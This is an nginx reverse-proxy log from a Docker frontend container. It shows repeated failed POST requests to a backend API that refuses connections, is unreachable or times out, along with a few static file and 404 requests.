frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:33 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:48:33 [error] 20#20: *8 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:48:33 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:01 +0000] "GET /conf/conf.js HTTP/1.1" 304 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:53:21 [error] 20#20: *12 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:21 [error] 20#20: *13 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:21 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:21 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:27 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:53:27 [error] 20#20: *13 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:27 [error] 20#20: *12 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:27 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:30 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:30 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:53:30 [error] 20#20: *13 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:30 [error] 20#20: *12 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:33 [error] 20#20: *12 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:33 [error] 20#20: *13 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:33 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:33 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:39 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:39 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:53:39 [error] 20#20: *22 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:39 [error] 20#20: *23 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:42 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:42 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:53:42 [error] 20#20: *23 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:42 [error] 20#20: *22 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:49 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:49 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:53:49 [error] 20#20: *28 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:49 [error] 20#20: *30 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:52 [error] 20#20: *28 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:53:52 [error] 20#20: *30 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:52 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:52 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:53:59 [error] 20#20: *34 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:59 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:53:59 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:53:59 [error] 20#20: *36 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:54:03 [error] 20#20: *34 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:03 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:03 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:54:03 [error] 20#20: *36 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:54:09 [error] 20#20: *40 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:09 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:09 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:54:09 [error] 20#20: *42 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:54:12 [error] 20#20: *42 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:12 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:12 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:54:12 [error] 20#20: *40 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:54:19 [error] 20#20: *46 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:19 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:19 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:54:19 [error] 20#20: *48 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:54:22 [error] 20#20: *46 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:22 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:22 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 19:54:22 [error] 20#20: *48 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:54:29 [error] 20#20: *52 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 19:54:29 [error] 20#20: *54 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.2:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:29 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:29 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:31 +0000] "POST /api/ HTTP/1.1" 499 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:19:54:31 +0000] "POST /api/ HTTP/1.1" 499 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:00:08 [error] 20#20: *58 open() "/frontend/app/config/getuser" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /config/getuser?index=0 HTTP/1.1", host: "140.112.230.89:80"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:00:08 +0000] "GET /config/getuser?index=0 HTTP/1.1" 404 146 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:08:22 +0000] "GET /conf/conf.js HTTP/1.1" 304 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:08:23 [error] 20#20: *60 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:08:23 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:08:23 [error] 20#20: *59 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:08:23 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:08:59 [error] 20#20: *64 upstream timed out (110: Operation timed out) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:08:59 +0000] "POST /api/ HTTP/1.1" 504 562 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:08:59 +0000] "POST /api/ HTTP/1.1" 504 562 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:08:59 [error] 20#20: *63 upstream timed out (110: Operation timed out) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:09:09 +0000] "POST /api/ HTTP/1.1" 499 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:09:09 +0000] "POST /api/ HTTP/1.1" 499 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:04 +0000] "GET /conf/conf.js HTTP/1.1" 304 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:18:08 [error] 20#20: *72 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:08 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:18:11 [error] 20#20: *72 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:11 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:18:14 [error] 20#20: *72 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:14 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:18:17 [error] 20#20: *72 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:17 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:18:20 [error] 20#20: *72 connect() failed (113: Host is unreachable) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:20 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:25 +0000] "POST /api/ HTTP/1.1" 499 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:25 +0000] "POST /api/ HTTP/1.1" 499 0 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:59 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:18:59 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:18:59 [error] 20#20: *81 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 20:18:59 [error] 20#20: *80 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:00 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:00 [error] 20#20: *80 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:00 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:00 [error] 20#20: *81 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 20:19:02 [error] 20#20: *81 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:02 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:02 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:02 [error] 20#20: *81 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 2021/05/05 20:19:05 [error] 20#20: *81 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:05 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [05/May/2021:20:19:05 +0000] "POST /api/ HTTP/1.1" 502 552 "http://localhost/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" "-"
frontend_1  | 2021/05/05 20:19:05 [error] 20#20: *81 connect() failed (111: Connection refused) while connecting to upstream, client: 172.18.0.1, server: localhost, request: "POST /api/ HTTP/1.1", upstream: "http://172.18.0.5:6978/api/", host: "localhost", referrer: "http://localhost/"
